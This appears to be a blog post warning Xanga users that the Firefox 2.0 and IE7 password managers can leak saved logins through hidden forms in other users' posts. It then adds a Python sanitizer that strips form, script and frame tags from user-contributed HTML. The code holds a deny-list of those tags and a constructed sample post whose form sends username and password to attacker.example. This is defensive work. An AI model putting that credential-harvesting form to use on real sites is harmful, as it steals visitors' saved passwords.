If you use Firefox 2.0 or Internet Explorer 7.0, and you want to avoid having your Xanga password stolen, you should immediately disable the "remember passwords for this site" option in these browsers.
Flaws in the way the new Firefox 2.0 and IE 7 browsers' password managers handle saved usernames and passwords can be exploited to send your Xanga username and password combination to an attacker's computer without your knowledge. Called Reverse Cross Site Request (RCSR), this attack might consist of a hidden form on a malicious Xanga user's post quietly requesting your saved username and password, either automatically or when you click on an offered link. Firefox 2.0 is more susceptible to this exploit because IE7 typically would not automatically fill in rogue forms with saved Xanga username/password information, whereas Firefox 2.0 will.
A very good but somewhat technical explanation of this exploit can be found here.
If you have Firefox 2.0 with the "Remember Passwords for this Site" option on and want to see a dramatic but safe proof-of-concept of this exploit, visit this demo, create a fake username and password, log in, and then proceed to click on the video as instructed (this video simulates content contributed by a malicious blogger on the same domain as yours - in other words, you visiting a malicious blogger's post and clicking on a video he has posted to steal your username and password).
Note: This is not a Xanga flaw, but the result of flaws in the browsers. And Xanga is no more prone to this attack than any other blog site. But all blog sites as a genre are extremely susceptible to this attack.
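The note above points at the root of the problem: a blog site renders other users' markup on the same origin as its own login page, so to a password manager any form inside a post is a form on the site it saved credentials for. The example below is added here and is not code from the original post or from Xanga; it shows the site-side mitigation a blog host can apply regardless of which browser the visitor uses: strip form controls, scripts and embedded frames from user-contributed HTML before rendering it, and keep an audit trail of what was removed. The tag lists, the `PostSanitizer` class and `sanitize_post` function are my own design, and the sample post (including the `attacker.example` host) is constructed for the demonstration.

```python
import html
from html.parser import HTMLParser

# Tags removed outright; their text content is kept so the post still reads.
# A <form> or <input> on the blog's origin is exactly what a password manager
# would fill with the visitor's saved credentials, so none may survive.
BLOCKED_TAGS = {"form", "input", "button", "select", "textarea", "label"}
# Tags removed together with everything inside them (script can submit a form,
# iframe/object/embed can load one from elsewhere).
BLOCKED_WITH_CONTENT = {"script", "iframe", "object", "embed", "style"}
# Attributes that may carry a URL; javascript: values are dropped.
URL_ATTRS = {"href", "src", "action", "formaction"}
# Tags that take no closing tag.
VOID_TAGS = {"br", "img", "hr"}


class PostSanitizer(HTMLParser):
    """Deny-list sanitizer for user-contributed post bodies (hypothetical helper)."""

    def __init__(self):
        super().__init__()          # convert_charrefs=True: text arrives decoded, re-escaped below
        self.out = []               # sanitized output fragments
        self.dropped = []           # audit trail of removed tags/attributes
        self._suppress = 0          # > 0 while inside a BLOCKED_WITH_CONTENT element

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            if name.startswith("on"):           # inline event handlers
                self.dropped.append(f"{tag}@{name}")
                continue
            if name in URL_ATTRS and value and value.strip().lower().startswith("javascript:"):
                self.dropped.append(f"{tag}@{name}")
                continue
            if value is None:
                kept.append(name)
            else:
                kept.append(f'{name}="{html.escape(value, quote=True)}"')
        return (" " + " ".join(kept)) if kept else ""

    def handle_starttag(self, tag, attrs):
        if tag in BLOCKED_WITH_CONTENT:
            self._suppress += 1
            self.dropped.append(tag)
            return
        if self._suppress:
            return
        if tag in BLOCKED_TAGS:
            self.dropped.append(tag)
            return
        self.out.append(f"<{tag}{self._clean_attrs(tag, attrs)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)    # void elements get no closing tag

    def handle_endtag(self, tag):
        if tag in BLOCKED_WITH_CONTENT:
            if self._suppress:
                self._suppress -= 1
            return
        if self._suppress or tag in BLOCKED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._suppress:
            self.out.append(html.escape(data, quote=False))


def sanitize_post(markup):
    """Return (clean_html, dropped) for one user-contributed post body."""
    parser = PostSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample of the kind of post the text describes: a login-shaped form
# that the visitor's password manager would fill, plus a script and a javascript: link.
SAMPLE_POST = (
    '<p>Check out my <b>video</b>!</p>'
    '<form action="http://attacker.example/collect" method="post">'
    '<input type="text" name="username"><input type="password" name="password">'
    '<input type="submit" value="Play video"></form>'
    '<a href="javascript:void(0)" onclick="go()">play</a>'
    '<script>/* would run on the blog origin */</script>'
    '<img src="cat.jpg">'
)

if __name__ == "__main__":
    clean, dropped = sanitize_post(SAMPLE_POST)
    print("clean  :", clean)
    print("dropped:", dropped)
```

A deny-list keeps the example readable, but a production filter should invert it into an allow-list of tags and attributes so that new elements default to being stripped. Serving the login page from a host that never renders user content removes the overlap entirely and is worth doing alongside the filtering.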